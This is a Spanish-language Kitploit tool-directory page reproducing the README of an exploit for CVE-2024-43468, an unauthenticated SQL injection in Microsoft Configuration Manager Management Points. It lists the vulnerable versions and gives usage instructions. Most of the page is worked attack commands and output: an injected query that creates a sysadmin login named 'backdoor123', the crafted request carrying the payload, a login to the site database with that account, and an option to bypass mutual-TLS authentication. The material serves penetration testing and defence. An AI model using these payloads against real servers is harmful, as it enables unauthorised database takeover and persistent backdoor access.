Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-43468 — Exploit para CVE-2024-43468: inyección SQL no autenticada en Microsoft Configuration Manager Management Points, permitiendo la ejecución arbitraria de SQL y escalada de privilegios a sysadmin mediante xp_cmdshell. | Kitploit
Herramientas/GitHubGitHub/synacktiv/cve-2024-43468
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubsynacktiv/cve-2024-43468

CVE-2024-43468

Exploit para CVE-2024-43468: inyección SQL no autenticada en Microsoft Configuration Manager Management Points, permitiendo la ejecución arbitraria de SQL y escalada de privilegios a sysadmin mediante xp_cmdshell.

Ver Repositorio
9613hace 4 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Inyecciones SQL no autenticadas (CVE-2024-43468) exploit

Este script explota la CVE-2024-43468 que permite a un atacante no autenticado, con acceso de red a un Punto de Administración, ejecutar consultas SQL arbitrarias en la base de datos del sitio.

Como las consultas se ejecutan con la identidad de la cuenta de máquina del MP, que tiene el rol sysadmin, es trivial escalar la inyección SQL a ejecución remota de código (con xp_cmdshell por ejemplo).

Cuando falta la KB29166583, todas las siguientes versiones de Microsoft Configuration Manager son vulnerables:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211 (*)

Para más detalles, consulte el aviso asociado disponible en https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections

Requisitos

  • En algunos casos, cuando el punto de administración está configurado con modo de comunicación HTTPS Only, se requiere un certificado PKI para realizar la autenticación mutua TLS contra el servicio HTTP vulnerable. Cualquier certificado emitido por la PKI interna con el propósito Client Authentication funcionará.
  • Si no tiene un certificado, use la opción --altauth (más información aquí)

Uso

root@kitploit:~
$ python3 CVE-2024-43468.py --help
usage: CVE-2024-43468.py [-h] -t TARGET -sql SQL [-machineid MACHINEID] -k KEY -c CERT

SCCM LocationMgr (MP_Location) Inyecciones SQL no autenticadas - CVE-2024-43468

options:
  -h, --help            muestra este mensaje de ayuda y sale
  -t TARGET, --target TARGET
                        Objetivo (http[s]://sccm-mp.local/)
  -sql SQL              Consulta a ejecutar a través de la inyección SQL de MachineID (ej. create login user123 with password = 'p4sswOrd' ; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin' )
  -machineid MACHINEID  Un MachineID válido para la segunda inyección SQL vía ContentID
  -k KEY, --key KEY     Archivo de clave privada para TLS mutuo
  -c CERT, --cert CERT  Archivo de certificado para TLS mutuo

  • Crear un nuevo usuario administrador
root@kitploit:~
$ python3 CVE-2024-43468.py -t http://sccm.local -sql "create login backdoor123 with password = 'P@sswOrd1'; exec master.dbo.sp_addsrvrolemember 'backdoor123', 'sysadmin'"
>>>> Header <<<<<
<Msg ReplyCompression="zlib" SchemaVersion="1.1"><Body Type="ByteRange" Length="556" Offset="0" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook3 Name="zlib-compress" /></Hooks><ID>{00000000-0000-0000-0000-000000000000}</ID><Payload Type="inline"/><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:dummyEndpoint:LS_ReplyLocations</ReplyTo><TargetAddress>mp:[http]MP_LocationManager</TargetAddress><TargetEndpoint>MP_LocationManager</TargetEndpoint><TargetHost>http://sccm.local</TargetHost><Timeout>60000</Timeout><SourceID>GUID:3b47a05a-db2e-40ef-8c77-cf29dac2ca1e'; create login backdoor123 with password = 'P@sswOrd1'; exec master.dbo.sp_addsrvrolemember 'backdoor123', 'sysadmin' ; select '1 </SourceID></Msg>

>>>> Request <<<<<
<UpdateSFRequest><Package ID="UID:060cb19a-4dde-4c6a-b08b-7fee96c4824b" Version="1"></Package><ClientLocationInfo><BoundaryGroups><BoundaryGroup GroupID="1" GroupGUID="00000000-0000-0000-0000-000000000000" GroupFlag="0"/></BoundaryGroups></ClientLocationInfo></UpdateSFRequest>


>>>> Response : 200 <<<<<
--aAbBcCdDv1234567890VxXyYzZ
content-type: text/plain; charset=UTF-16

ÿþNoReply
--aAbBcCdDv1234567890VxXyYzZ--
  • Después, acceda a la base de datos de SCCM con el administrador recién creado.
root@kitploit:~
$ mssqlclient.py  -debug './backdoor123:P@sswOrd1'@sccm-db.local
SQL (backdoor123  dbo@master)> use CM_ABC
SQL (backdoor123  dbo@CM_ABC)> select Name0 from v_R_System
Name0
------
DC
  • Use mTLS en caso de que el Punto de Administración solicite un certificado de cliente.
root@kitploit:~
$ python3 CVE-2024-43468.py -t https://sccm.local -sql "..."
[...]
>>>> Response : 403 Se requiere certificado de cliente <<<<<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

$ python3 CVE-2024-43468.py -k any_client1.key -c any_client1.pem -t https://sccm.local -sql "..."
>>>> Response : 200 <<<<<
--aAbBcCdDv1234567890VxXyYzZ
content-type: text/plain; charset=UTF-16

ÿþNoReply
--aAbBcCdDv1234567890VxXyYzZ--

Bypassear la autenticación mTLS con el segmento altauth (más información aquí)

root@kitploit:~
$ python3 CVE-2024-43468.py --altauth -t https://sccm.local -sql "..."
>>>> Response : 200 <<<<<
--aAbBcCdDv1234567890VxXyYzZ
content-type: text/plain; charset=UTF-16

ÿþNoReply
--aAbBcCdDv1234567890VxXyYzZ--

Referencias

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468
Descargar herramienta